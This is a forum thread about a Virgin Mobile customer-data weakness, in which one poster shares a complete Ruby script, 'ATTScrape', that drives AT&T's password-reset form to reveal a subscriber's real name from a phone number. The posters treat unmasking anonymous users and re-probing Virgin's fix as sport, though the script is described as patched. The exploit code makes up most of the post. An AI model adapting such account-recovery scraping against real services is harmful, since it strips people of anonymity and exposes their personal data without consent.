Six million Virgin Mobile accounts vulnerable

[limdis]

http://kev.inburke.com/kevin/open-seaso ... omer-data/?

[NoviceBlackout]

http://kev.inburke.com/kevin/open-season-on-virgin-mobile-customer-data/?

That's just embarrassing on Vrigin's behalf.
I noticed in one of the comments that Virgin recommend somebody's birthday for the 6 digit code.
How stupid could one company be!

[weekend hacker]

This kind of stuff reminds me of the AT&T privacy vuln that was finally closed last year when some media places started to report on it.
If you knew the number, and wanted to "reset the password" it would show your real name and asked if this was you... then you could proceed with the password reset.

So anyone who knew the phone number could find out what that persons real name was. Some silly anons ware not so anon after that..
It was patched some ware in 2011, the guy who initially discovered this and showed me the code did so in november 2010.
So this was just months after Goatse security found a vuln "that could allow anyone to uncover email addresses belonging to customers of AT&T 3G service for the Apple iPad.".
Only he didn't decide to tell gawker about it and it remained there for almost exactly a year(thats what made me remember, the strangeness that it was disclosed after almost exactly 1 year)
I'll include the automated version in this post because its patched now anyway and gives credit where credit is due.

Code: Select all

# ATTScrape
# An exploit-driven reverse lookup on at&t wireless subscribers
# Exploit found and written by Lord 0xF

require 'rubygems'
require 'mechanize'

number = ARGV[0]

def do_magic(number)
  mech = Mechanize.new
  # go to page 1
  mech.get('https://www.att.com/olam/forgotPasswordAction.olamexecute?forgotPasswordActionEvent=forgotPasswordStep1') do |page|
    # submit the number and form stuff and go on to page 2
    page_step1 = page.form_with(:name => 'forgotPasswordActionForm') do |f|
      f.forgotPasswordActionEvent = 'forgotPasswordStep2'
      f.reportActionEvent = 'A_FPWD_FORGOT_PASS_IN_PROGRESS_SUB'
      f.uverseon = 'true'
      f.wirelineon = 'false'
      f.ctnOrMemberId = number
    end.click_button
    # make sure subscriber exists
    if page_step1.body.include? 'FP201'
      @error = 'NO SUBSCRIBER'
      return false
    end
    # parse page 2
    @name = page_step1.body.scan(/\'AccountOwnerName\'\,\'([^<>]*)\'\)/imu).flatten.to_s.split('  ').join(' ')
    # if we still don't have it, keep going
    if @name == '' then
       page_step2 = page_step1.form_with(:name => 'forgotPasswordActionForm') do |f|
         f.zip = '10000'
         f.ssn = '9999'
       end.click_button
       @name = page_step2.body.scan(/\'AccountOwnerName\'\,\'([^<>]*)\'\)/imu).flatten
     end
     # if its still not here, the record doesn't exist
     if @name == '' then
       @error = 'NO RECORD'
       return false
     end
  end
end

if do_magic(number) != false then
  puts @name
else
  puts @error
end

So maybe after virgin patches this, it'll be worth taking another look to see if they did it right?

EDIT: Somehow I can't find the report about this anywhere anymore. :s